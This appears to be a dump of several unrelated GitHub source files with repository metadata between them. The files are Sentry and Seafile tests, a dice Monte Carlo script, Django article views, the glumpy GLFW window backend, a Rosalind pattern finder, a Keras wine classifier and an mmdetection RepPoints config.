slug='nulldb',
user=self.user,
)
def test_creates_api_authorization(self):
install, grant = self.creator.call()
assert ApiAuthorization.objects.get(
application=self.sentry_app.application,
user=self.sentry_app.proxy_user,
scopes=self.sentry_app.scopes,
)
def test_creates_installation(self):
install, grant = self.creator.call()
assert install.pk
def test_creates_api_grant(self):
install, grant = self.creator.call()
assert grant.pk
@patch('sentry.tasks.app_platform.installation_webhook.delay')
def test_notifies_service(self, installation_webhook):
install, _ = self.creator.call()
installation_webhook.assert_called_once_with(install.id, self.user.id)
def test_associations(self):
install, grant = self.creator.call()
assert install.api_grant == grant
assert install.authorization is not None
|
[
"noreply@github.com"
] |
conan25216.noreply@github.com
|
38a81091e93b14ef1136031dcd8071060b60dc35
|
1ff6cd4b1114b530a0f2918f6d2193b2ce270bcf
|
/Week-2/Day_4/die_roll.py
|
6d39b06fc9f5660daad7d8d3199b080ad48932b8
|
[] |
no_license
|
Ace238/python-bootcamp
|
e8fac460488701eff6453bd81ddab8eb4059a2aa
|
adea58b8f9b87a52338181f677f01d6cbc802046
|
refs/heads/master
| 2020-12-05T15:08:58.366028
| 2020-01-16T05:22:02
| 2020-01-16T05:22:02
| 232,150,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,582
|
py
|
import random
def roll_die(dice_max):
"""
returns a die roll - random integer between 1 and 6
0 through 6 are each side of a standard die
"""
return random.randint(1,dice_max)
def monte_carlo(n):
"""
performs a monte carlo simulation of a die roll
[PARAM]\t n (int) - number of samples
[RETURN]\t None - prints out the results of the simulation
"""
one_count = 0
two_count = 0
three_count = 0
four_count = 0
five_count = 0
six_count = 0
exp_count = 0
while exp_count <n:
result = roll_die()
if(result == 1):
one_count += 1
elif(result == 2):
two_count += 1
elif(result == 3):
three_count += 1
elif(result == 4):
four_count += 1
elif(result == 5):
five_count += 1
elif(result == 6):
six_count += 1
exp_count += 1
print(f"There were {n} simulations performed.")
msg = f"There were {(one_count/n) * 100}% ones"
print(msg)
msg = f"There were {(two_count/n) * 100}% twos"
print(msg)
msg = f"There were {(three_count/n) * 100}% threes"
print(msg)
msg = f"There were {(four_count/n) * 100}% fours"
print(msg)
msg = f"There were {(five_count/n) * 100}% fives"
print(msg)
msg = f"There were {(six_count/n) * 100}% sixes"
print(msg)
# monte_carlo(100000)
def monte_carlo_with_lists(N, dice_max = 6):
results = []
for exp in range(0,N):
results.append(roll_die(dice_max))
print(f"{N} experiments performed")
for outcome in range(1, dice_max + 1):
count = results.count(outcome)
msg = f"The probability of {outcome} = {(count/N)*100}%"
print(msg)
dice_max = 10
monte_carlo_with_lists(10000, dice_max)
|
[
"tmilien000@citymail.cuny.edu"
] |
tmilien000@citymail.cuny.edu
|
84340a119e8fdb72320174077f9aa1c0605ca64f
|
9d566e153a254390ed758f4e945781899b6dcd07
|
/03_django/02_django_crud/articles/views.py
|
e9c78e872870c579df912051bc9513f1f01afb88
|
[] |
no_license
|
baambox5/TIL
|
6f1b0fdc342ed29b85a68404b916fc6f4cace7bf
|
0419779ccbf506a1e89d581b98658dd07b78388c
|
refs/heads/master
| 2023-01-13T01:14:08.125234
| 2020-01-17T14:36:34
| 2020-01-17T14:36:34
| 195,918,108
| 0
| 0
| null | 2023-01-07T11:27:08
| 2019-07-09T02:31:02
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,964
|
py
|
from IPython import embed
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from .models import Article, Comment
# Create your views here.
def index(request):
# articles = Article.objects.all()
articles = Article.objects.order_by('-pk') # DB가 변경(가능한 권장)
# articles = Article.objects.all()[::-1] # python이 변경
context = {'articles': articles,}
return render(request, 'articles/index.html', context)
def create(request):
# CREATE
if request.method == 'POST':
title = request.POST.get('title')
content = request.POST.get('content')
image = request.FILES.get('image')
# 1
# article = Article()
# article.title = title
# article.content = content
# article.save()
# 2
article = Article(title=title, content=content, image=image)
article.save()
# 3
# Article.objects.create(title=title, content=content)
return redirect(article) # 메인 페이지
# return redirect('/articles/', article.pk)
# NEW
else:
return render(request, 'articles/create.html')
def detail(request, article_pk):
article = Article.objects.get(pk=article_pk)
comments = article.comment_set.all()
context = {'article': article, 'comments': comments,}
return render(request, 'articles/detail.html', context)
def delete(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.delete()
return redirect('articles:index')
else:
return redirect(article)
def update(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.title = request.POST.get('title')
article.content = request.POST.get('content')
article.image = request.FILES.get('image')
article.save()
return redirect(article)
else:
context = {'article': article,}
return render(request, 'articles/update.html', context)
def comments_create(request, article_pk):
# 댓글을 달 게시글
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
# form에서 넘어온 댓글 정보
content = request.POST.get('content')
# 댓글 생성 및 저장
comment = Comment(article=article, content=content)
comment.save()
return redirect(article)
# return redirect('articles:detail', article.pk)
# return redirect('articles:detail' article_pk)
else:
return redirect(article)
def comments_delete(request, article_pk, comment_pk):
# article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
comment = Comment.objects.get(pk=comment_pk)
comment.delete()
# return redirect(article)
return redirect('articles:detail', article_pk)
|
[
"baamboxo@gmail.com"
] |
baamboxo@gmail.com
|
488814efa60cb7ab1632ed5a4b887fa663a17a55
|
3a6235a79585ed60da42ae6bd69d140c80a5ac4a
|
/Week_01/加1.py
|
06b05dff7e9e38a989632355c6b053e0a9ec6136
|
[] |
no_license
|
Jackson026/AlgorithmQIUZHAO
|
dea6c58d972bc5039e392a16676ad1d60398e1a8
|
09feae0783c8d21bf1b9aaad7fa6917f05ff7162
|
refs/heads/master
| 2022-12-16T23:40:42.151486
| 2020-09-02T07:14:21
| 2020-09-02T07:14:21
| 279,640,530
| 1
| 0
| null | 2020-07-14T16:41:36
| 2020-07-14T16:41:35
| null |
UTF-8
|
Python
| false
| false
| 650
|
py
|
# 取巧的办法是转换成字符串然后变为int,最后再转换回去原来的形式,通用性不强,就不作为一种方法写在这里
# 按位运算,倒序,如果是9,就变为0,向前循环,不为9则直接加1;
# 如果为999这种特殊形式,则在循环结束后,列表头插入1 .insert(位置,数)
def plusOne(self, digits):
if not digits:
return digits + [1]
for i in range(len(digits) - 1, -1, -1):
if digits[i] == 9:
digits[i] = 0
else:
digits[i] = digits[i] + 1
break
if digits[0] == 0:
digits.insert(0, 1)
return digits
|
[
"guozijia26@126.com"
] |
guozijia26@126.com
|
ba5641cad8c7c2185a8bca2d2985f2d0f54439df
|
2a76ca8c01e7abe6ef64d030ecbb65e88641b278
|
/glumpy/app/window/backends/backend_glfw_deprecated.py
|
66413814abff7f25ba48933d91f337089dd6e8fb
|
[] |
permissive
|
glumpy/glumpy
|
18bfc2d76b7a5fc126fbebddf2970d95238fc66b
|
75408635bd46e48ff10939e308a71eafdaff35e8
|
refs/heads/master
| 2023-09-03T11:48:52.087002
| 2023-04-20T15:23:59
| 2023-04-20T15:23:59
| 23,520,171
| 1,228
| 225
|
BSD-3-Clause
| 2023-07-07T07:25:18
| 2014-08-31T18:30:26
|
Python
|
UTF-8
|
Python
| false
| false
| 17,130
|
py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2009-2016 Nicolas P. Rougier. All rights reserved.
# Distributed under the (new) BSD License.
# -----------------------------------------------------------------------------
"""
`GLFW <http://www.glfw.org>`_ is an Open Source, multi-platform library for
creating windows with OpenGL contexts and receiving input and events. It is
easy to integrate into existing applications and does not lay claim to the main
loop.
**Usage**
.. code:: python
from glumpy import app
app.use("glfw")
window = app.Window()
**Capability**
========================== ======== ======================== ========
Multiple windows ✓ Set GL API ✓
-------------------------- -------- ------------------------ --------
Non-decorated windows ✓ Set GL Profile ✓
-------------------------- -------- ------------------------ --------
Resize windows ✓ Share GL Context ✓
-------------------------- -------- ------------------------ --------
Move windows ✓ Unicode handling ✓
-------------------------- -------- ------------------------ --------
Fullscreen ✓ Scroll event ✓
========================== ======== ======================== ========
"""
import os, sys, platform
from glumpy import gl
from glumpy.log import log
from glumpy.app import configuration
from glumpy.app.window import window
# Backend name
__name__ = "GLFW"
# Backend version (if available)
__version__ = ""
# Backend availability
__availability__ = False
# Whether the framework has been initialized
__initialized__ = False
# Active windows
__windows__ = []
# Windows scheduled to be destroyed
__windows_to_remove__ = []
# ---------------------------------------------------- convenient functions ---
def name(): return __name__
def version(): return __version__
def available(): return __availability__
# --------------------------------------------------------------- init/exit ---
def __init__():
global __initialized__
if not __initialized__:
# glfw might change dir on initialization (feature, not a bug)
cwd = os.getcwd()
glfw.glfwInit()
os.chdir(cwd)
__initialized__ = True
def __exit__():
global __initialized__
glfw.glfwTerminate()
__initialized__ = False
# ------------------------------------------------------------ availability ---
try:
from glumpy.ext import glfw
__availability__ = True
__version__ = ("%d.%d.%d") % glfw.version
__init__()
__mouse_map__ = { glfw.GLFW_MOUSE_BUTTON_LEFT: window.mouse.LEFT,
glfw.GLFW_MOUSE_BUTTON_MIDDLE: window.mouse.MIDDLE,
glfw.GLFW_MOUSE_BUTTON_RIGHT: window.mouse.RIGHT }
__key_map__ = { glfw.GLFW_KEY_ESCAPE: window.key.ESCAPE,
glfw.GLFW_KEY_ENTER: window.key.ENTER,
glfw.GLFW_KEY_TAB: window.key.TAB,
glfw.GLFW_KEY_BACKSPACE: window.key.BACKSPACE,
glfw.GLFW_KEY_INSERT: window.key.INSERT,
glfw.GLFW_KEY_DELETE: window.key.DELETE,
glfw.GLFW_KEY_RIGHT: window.key.RIGHT,
glfw.GLFW_KEY_LEFT: window.key.LEFT,
glfw.GLFW_KEY_DOWN: window.key.DOWN,
glfw.GLFW_KEY_UP: window.key.UP,
glfw.GLFW_KEY_PAGE_UP: window.key.PAGEUP,
glfw.GLFW_KEY_PAGE_DOWN: window.key.PAGEDOWN,
glfw.GLFW_KEY_HOME: window.key.HOME,
glfw.GLFW_KEY_END: window.key.END,
glfw.GLFW_KEY_CAPS_LOCK: window.key.CAPSLOCK,
glfw.GLFW_KEY_LEFT_SHIFT: window.key.LSHIFT,
glfw.GLFW_KEY_RIGHT_SHIFT: window.key.RSHIFT,
glfw.GLFW_KEY_PRINT_SCREEN: window.key.PRINT,
glfw.GLFW_KEY_PAUSE: window.key.PAUSE,
glfw.GLFW_KEY_F1: window.key.F1,
glfw.GLFW_KEY_F2: window.key.F2,
glfw.GLFW_KEY_F3: window.key.F3,
glfw.GLFW_KEY_F4: window.key.F4,
glfw.GLFW_KEY_F5: window.key.F5,
glfw.GLFW_KEY_F6: window.key.F6,
glfw.GLFW_KEY_F7: window.key.F7,
glfw.GLFW_KEY_F8: window.key.F8,
glfw.GLFW_KEY_F9: window.key.F9,
glfw.GLFW_KEY_F10: window.key.F10,
glfw.GLFW_KEY_F11: window.key.F11,
glfw.GLFW_KEY_F12: window.key.F12 }
except ImportError:
__availability__ = False
__version__ = None
# -------------------------------------------------------------- capability ---
capability = {
"Window position get/set" : True,
"Window size get/set" : True,
"Multiple windows" : True,
"Mouse scroll events" : True,
"Non-decorated window" : True,
"Non-sizeable window" : True,
"Fullscreen mode" : True,
"Unicode processing" : True,
"Set GL version" : True,
"Set GL profile" : True,
"Share GL context" : True,
}
# ------------------------------------------------------- set_configuration ---
def set_configuration(config):
""" Set gl configuration for GLFW """
glfw.glfwWindowHint( glfw.GLFW_REFRESH_RATE, 0 )
glfw.glfwWindowHint(glfw.GLFW_RED_BITS, config.red_size)
glfw.glfwWindowHint(glfw.GLFW_GREEN_BITS, config.green_size)
glfw.glfwWindowHint(glfw.GLFW_BLUE_BITS, config.blue_size)
glfw.glfwWindowHint(glfw.GLFW_ALPHA_BITS, config.alpha_size)
glfw.glfwWindowHint(glfw.GLFW_ACCUM_RED_BITS, 0)
glfw.glfwWindowHint(glfw.GLFW_ACCUM_GREEN_BITS, 0)
glfw.glfwWindowHint(glfw.GLFW_ACCUM_BLUE_BITS, 0)
glfw.glfwWindowHint(glfw.GLFW_ACCUM_ALPHA_BITS, 0)
glfw.glfwWindowHint(glfw.GLFW_DEPTH_BITS, config.depth_size)
glfw.glfwWindowHint(glfw.GLFW_STENCIL_BITS, config.stencil_size)
glfw.glfwWindowHint(glfw.GLFW_SRGB_CAPABLE, config.srgb)
glfw.glfwWindowHint(glfw.GLFW_SAMPLES, config.samples)
glfw.glfwWindowHint(glfw.GLFW_STEREO, config.stereo)
if config.api in ("ES", "es"):
glfw.glfwWindowHint(glfw.GLFW_CLIENT_API,
glfw.GLFW_OPENGL_ES_API)
else:
glfw.glfwWindowHint(glfw.GLFW_CONTEXT_VERSION_MAJOR,
config.major_version)
glfw.glfwWindowHint(glfw.GLFW_CONTEXT_VERSION_MINOR,
config.minor_version)
if config.major_version >= 3 and config.profile == "core":
glfw.glfwWindowHint(glfw.GLFW_OPENGL_PROFILE,
glfw.GLFW_OPENGL_CORE_PROFILE)
glfw.glfwWindowHint(glfw.GLFW_OPENGL_FORWARD_COMPAT, True)
elif config.major_version >= 3 and config.profile == "compatibility":
glfw.glfwWindowHint(glfw.GLFW_OPENGL_PROFILE,
glfw.GLFW_OPENGL_COMPAT_PROFILE)
else:
glfw.glfwWindowHint(glfw.GLFW_OPENGL_PROFILE,
glfw.GLFW_OPENGL_ANY_PROFILE)
# ------------------------------------------------------------------ Window ---
class Window(window.Window):
def __init__( self, width=512, height=512, title=None, visible=True, aspect=None,
decoration=True, fullscreen=False, screen=None, config=None, context=None, color=(0,0,0,1), vsync=False):
window.Window.__init__(self, width=width,
height=height,
title=title,
visible=visible,
aspect=aspect,
decoration=decoration,
fullscreen=fullscreen,
screen=screen,
config=config,
context=context,
color=color)
# Whether hidpi is active
self._hidpi = False
def on_error(error, message):
log.warning(message)
glfw.glfwSetErrorCallback(on_error)
glfw.glfwWindowHint(glfw.GLFW_RESIZABLE, True)
glfw.glfwWindowHint(glfw.GLFW_DECORATED, True)
glfw.glfwWindowHint(glfw.GLFW_VISIBLE, True)
if not decoration:
glfw.glfwWindowHint(glfw.GLFW_DECORATED, False)
if not visible:
glfw.glfwWindowHint(glfw.GLFW_VISIBLE, False)
if config is None:
config = configuration.Configuration()
set_configuration(config)
monitor = glfw.glfwGetMonitors()[self._screen] if fullscreen else None
if fullscreen:
mode = glfw.glfwGetVideoMode(monitor)
self._width, self._height = mode[:2]
self._native_window = glfw.glfwCreateWindow(self._width, self._height,
self._title, monitor, None)
if not self._native_window:
log.critical("Window creation failed")
__exit__()
sys.exit()
glfw.glfwMakeContextCurrent(self._native_window)
glfw.glfwSwapInterval(1 if vsync else 0)
# OSX: check framebuffer size / window size. On retina display, they
# can be different so we try to correct window size such as having
# the framebuffer size of the right size
w,h = glfw.glfwGetFramebufferSize(self._native_window)
if platform == 'darwin' and (w!= width or h!= height):
width, height = width//2, height//2
glfw.glfwSetWindowSize(self._native_window, width, height)
log.info("HiDPI detected, fixing window size")
self._hidpi = True
def on_framebuffer_resize(win, width, height):
self._width, self._height = width, height
self.dispatch_event('on_resize', width, height)
glfw.glfwSetFramebufferSizeCallback(self._native_window, on_framebuffer_resize)
# def on_resize(win, width, height):
# self._width, self._height = width, height
# self.dispatch_event('on_resize', width, height)
# glfw.glfwSetWindowSizeCallback(self._native_window, on_resize)
def on_cursor_enter(win, entered):
if entered:
self.dispatch_event('on_enter')
else:
self.dispatch_event('on_leave')
glfw.glfwSetCursorEnterCallback(self._native_window, on_cursor_enter)
def on_window_close(win):
self.close()
glfw.glfwSetWindowCloseCallback(self._native_window, on_window_close)
def on_keyboard(win, key, scancode, action, mods):
symbol = self._keyboard_translate(key)
modifiers = self._modifiers_translate(mods)
if action in[glfw.GLFW_PRESS,glfw.GLFW_REPEAT]:
self.dispatch_event('on_key_press', symbol, modifiers)
else:
self.dispatch_event('on_key_release', symbol, modifiers)
glfw.glfwSetKeyCallback(self._native_window, on_keyboard)
def on_character(win, character):
self.dispatch_event('on_character', u"%c" % character)
glfw.glfwSetCharCallback(self._native_window, on_character)
def on_mouse_button(win, button, action, mods):
x,y = glfw.glfwGetCursorPos(win)
if self._hidpi:
x, y = 2*x, 2*y
button = __mouse_map__.get(button, window.mouse.UNKNOWN)
if action == glfw.GLFW_RELEASE:
self._button = window.mouse.NONE
self._mouse_x = x
self._mouse_y = y
self.dispatch_event('on_mouse_release', x, y, button)
elif action == glfw.GLFW_PRESS:
self._button = button
self._mouse_x = x
self._mouse_y = y
self.dispatch_event('on_mouse_press', x, y, button)
glfw.glfwSetMouseButtonCallback(self._native_window, on_mouse_button)
def on_mouse_motion(win, x, y):
if self._hidpi:
x, y = 2*x, 2*y
dx = x - self._mouse_x
dy = y - self._mouse_y
self._mouse_x = x
self._mouse_y = y
if self._button != window.mouse.NONE:
self.dispatch_event('on_mouse_drag', x, y, dx, dy, self._button)
else:
self.dispatch_event('on_mouse_motion', x, y, dx, dy)
glfw.glfwSetCursorPosCallback(self._native_window, on_mouse_motion)
def on_scroll(win, xoffset, yoffset):
x,y = glfw.glfwGetCursorPos(win)
if self._hidpi:
x, y = 2*x, 2*y
self.dispatch_event('on_mouse_scroll', x, y, xoffset, yoffset)
glfw.glfwSetScrollCallback( self._native_window, on_scroll )
self._width, self._height = self.get_size()
__windows__.append(self)
def _modifiers_translate( self, modifiers ):
_modifiers = 0
if modifiers & glfw.GLFW_MOD_SHIFT:
_modifiers |= window.key.MOD_SHIFT
if modifiers & glfw.GLFW_MOD_CONTROL:
_modifiers |= window.key.MOD_CTRL
if modifiers & glfw.GLFW_MOD_ALT:
_modifiers |= window.key.MOD_ALT
if modifiers & glfw.GLFW_MOD_SUPER:
_modifiers |= window.key.MOD_COMMAND
self._modifiers = modifiers
return _modifiers
def _keyboard_translate( self, code ):
if (32 <= code <= 96) or code in [161,162]:
return code
return __key_map__.get(code, window.key.UNKNOWN)
def show(self):
glfw.glfwShowWindow( self._native_window )
self.dispatch_event('on_show')
def hide(self):
glfw.glfwHideWindow( self._native_window )
self.dispatch_event('on_hide')
def close(self):
glfw.glfwSetWindowShouldClose(self._native_window, True)
__windows__.remove(self)
__windows_to_remove__.append(self)
for i in range(len(self._timer_stack)):
handler, interval = self._timer_stack[i]
self._clock.unschedule(handler)
self.dispatch_event('on_close')
def destroy(self):
glfw.glfwDestroyWindow(self._native_window)
def get_screen(self):
return glfw.glfwGetWindowMonitor(self._native_window)
def set_fullscreen(self, fullscreen, screen=None):
screen = 0 if screen is None else screen
mode = glfw.glfwGetVideoMode(glfw.glfwGetMonitors()[screen])
if fullscreen:
glfw.glfwSetWindowMonitor(self._native_window, screen, 0, 0, mode[0], mode[1], mode[-1])
else:
glfw.glfwSetWindowMonitor(self._native_window, screen, 0, 0, 256, 256, mode[-1])
def get_fullscreen(self):
return self._fullscreen
def set_title(self, title):
glfw.glfwSetWindowTitle( self._native_window, title)
self._title = title
def get_title(self):
return self._title
def set_size(self, width, height):
glfw.glfwSetWindowSize(self._native_window, width, height)
self._width, self._height = glfw.glfwGetFramebufferSize(self._native_window)
def get_size(self):
# self._width, self._height = glfw.glfwGetWindowSize(self._native_window)
self._width, self._height = glfw.glfwGetFramebufferSize(self._native_window)
return self._width, self._height
def set_position(self, x, y):
glfw.glfwSetWindowPos(self._native_window, x, y)
self._x, self._y = glfw.glfwGetWindowPos(self._native_window)
def get_position(self):
self._x, self._y = glfw.glfwGetWindowPos(self._native_window)
return self._x, self._y
def swap(self):
glfw.glfwSwapBuffers(self._native_window)
def activate(self):
glfw.glfwMakeContextCurrent(self._native_window)
# ----------------------------------------------------------------- windows ---
def windows():
return __windows__
# ----------------------------------------------------------------- process ---
def process(dt):
# Poll for and process events
glfw.glfwPollEvents()
for window in __windows__:
# Make window active
window.activate()
# Dispatch the main draw event
window.dispatch_event('on_draw', dt)
# Dispatch the idle event
window.dispatch_event('on_idle', dt)
# Swap buffers
window.swap()
for window in __windows_to_remove__:
window.destroy()
__windows_to_remove__.remove(window)
return len(__windows__)
|
[
"jstreibel@gmail.com"
] |
jstreibel@gmail.com
|
01ed2276aaa8ccf051e68654900f77f99150ae15
|
4de03eecadc4c69caf792f4773571c2f6dbe9d68
|
/tests/seahub/share/views/test_send_shared_link.py
|
c265c943065929d26d603cb4f387bfa7dd71b7aa
|
[
"Apache-2.0"
] |
permissive
|
Tr-1234/seahub
|
c1663dfd12f7584f24c160bcf2a83afdbe63a9e2
|
ed255e0566de054b5570218cb39cc320e99ffa44
|
refs/heads/master
| 2022-12-23T16:20:13.138757
| 2020-10-01T04:13:42
| 2020-10-01T04:13:42
| 300,138,290
| 0
| 0
|
Apache-2.0
| 2020-10-01T04:11:41
| 2020-10-01T04:11:40
| null |
UTF-8
|
Python
| false
| false
| 3,204
|
py
|
from mock import patch
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import override_settings
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache
from seahub.test_utils import BaseTestCase
class SendSharedLinkTest(BaseTestCase):
def setUp(self):
mail.outbox = []
@override_settings(DEFAULT_FROM_EMAIL='from_noreply@seafile.com')
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
def test_can_send(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == 'from_noreply@seafile.com'
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == self.user.email
assert mail.outbox[0].extra_headers['Reply-to'] == self.user.email
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite_contact_email(self):
self.login_as(self.user)
nickname = 'Testuser'
contact_email= 'contact_email@test.com'
p = Profile.objects.add_or_update(self.user.email, nickname=nickname)
p.contact_email = contact_email
p.save()
refresh_cache(self.user.email)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == contact_email
assert mail.outbox[0].extra_headers['Reply-to'] == contact_email
|
[
"colinsippl@gmx.de"
] |
colinsippl@gmx.de
|
0340fad6844580f9a0ff3797769971efcc2f644a
|
52a4d869976a97498bdf56a8d0ff92cac138a136
|
/Bioinformatics Textbook Track/Chapter 1/rosalind_ba1d.py
|
4e6d4b0953bb2d76fa147c0368a4f8c3ded360aa
|
[] |
no_license
|
aakibinesar/Rosalind
|
d726369a787d848cc378976b886189978a60a3a5
|
375bbdbfb16bf11b2f980701bbd0ba74a1605cdb
|
refs/heads/master
| 2022-08-18T09:36:00.941080
| 2020-05-24T18:49:38
| 2020-05-24T18:49:38
| 264,722,651
| 0
| 0
| null | 2020-05-17T17:51:03
| 2020-05-17T17:40:59
| null |
UTF-8
|
Python
| false
| false
| 747
|
py
|
def occurrences(genome, sub):
"""
:param genome: genome for processing
:param sub: pattern for which we find indexes of occurnces
:return: list of indexes
"""
start = 0
indexes = []
while True:
start = genome.find(sub, start)
if start > 0:
indexes.append(start)
else:
break
start += 1
return indexes
def read_data_from(file_name):
with open(file_name, "r") as file:
pattern = file.readline().strip()
genome = file.readline().strip()
return genome, pattern
if __name__ == "__main__":
genome, pattern = read_data_from("rosalind_ba1d.txt")
indexes = occurrences(genome, pattern)
for ind in indexes:
print ind,
|
[
"noreply@github.com"
] |
aakibinesar.noreply@github.com
|
f1c755702c61d3a4c3f5e88391da6a3096250b2f
|
5399dd4580ea3f528753bc8b52a981743d62f8bb
|
/keras/keras36_hist3_wine.py
|
6844fef8e2c4a5ad39b62167985de24abdf45314
|
[] |
no_license
|
iwillbeaprogramer/Study
|
3ac7c118ffe3981d78b4ad263cb62432eae13970
|
3bfe571da5bbfc545b994e5878e217f9306bde14
|
refs/heads/main
| 2023-05-07T16:31:05.564973
| 2021-05-27T14:50:00
| 2021-05-27T14:50:00
| 324,044,441
| 8
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,733
|
py
|
from sklearn.datasets import load_wine
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler,OneHotEncoder
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.callbacks import EarlyStopping
import matplotlib.pyplot as plt
early_stopping = EarlyStopping(monitor='loss',patience=10)
datasets = load_wine()
x = datasets.data
y = datasets.target
encoder = OneHotEncoder()
y = encoder.fit_transform(y.reshape(-1,1)).toarray()
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2)
x_train,x_val,y_train,y_val = train_test_split(x_train,y_train,test_size=0.2)
scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
x_test = scaler.fit_transform(x_test)
x_val = scaler.fit_transform(x_val)
model = Sequential()
model.add(Dense(128,activation='relu',input_dim=13))
model.add(Dense(64,activation='relu'))
model.add(Dense(32,activation='relu'))
model.add(Dense(16,activation='relu'))
model.add(Dense(8,activation='relu'))
model.add(Dense(3,activation='softmax'))
model.compile(loss = 'categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
hist = model.fit(x_train,y_train,validation_data=(x_val,y_val),epochs=300,batch_size=4)
loss = model.evaluate(x_test,y_test,batch_size=4)
y_pred = model.predict(x_test)
print('loss : ',loss[0],'\naccuracy : ',loss[1])
'''
DNN
loss : 3.391478821868077e-05
accuracy : 1.0
'''
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.plot(hist.history['accuracy'])
plt.plot(hist.history['val_accuracy'])
plt.title('loss & acc')
plt.ylabel('loss, acc')
plt.xlabel('epochs')
plt.legend(['train_loss','val_loss','train_acc','val_acc'])
plt.show()
|
[
"wisixicidi@gmail.com"
] |
wisixicidi@gmail.com
|
a3cf7cefbf7e8537e0c1fe7a704c4158e33f881b
|
39e03684081b27311385a0ab31afcc2e09883e5c
|
/configs/reppoints/bbox_r50_grid_center_fpn_1x.py
|
f971b5b7b8c78a6abca727e7015b96d085b5f33b
|
[
"MIT",
"Python-2.0"
] |
permissive
|
witnessai/MMSceneGraph
|
8d0b2011a946ddcced95fbe15445b7f4da818509
|
bc5e0f3385205404c712ae9f702a61a3191da0a1
|
refs/heads/master
| 2023-08-12T06:54:00.551237
| 2021-10-12T03:04:21
| 2021-10-12T03:04:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,462
|
py
|
# model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=81,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='minmax',
use_grid_points=True))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
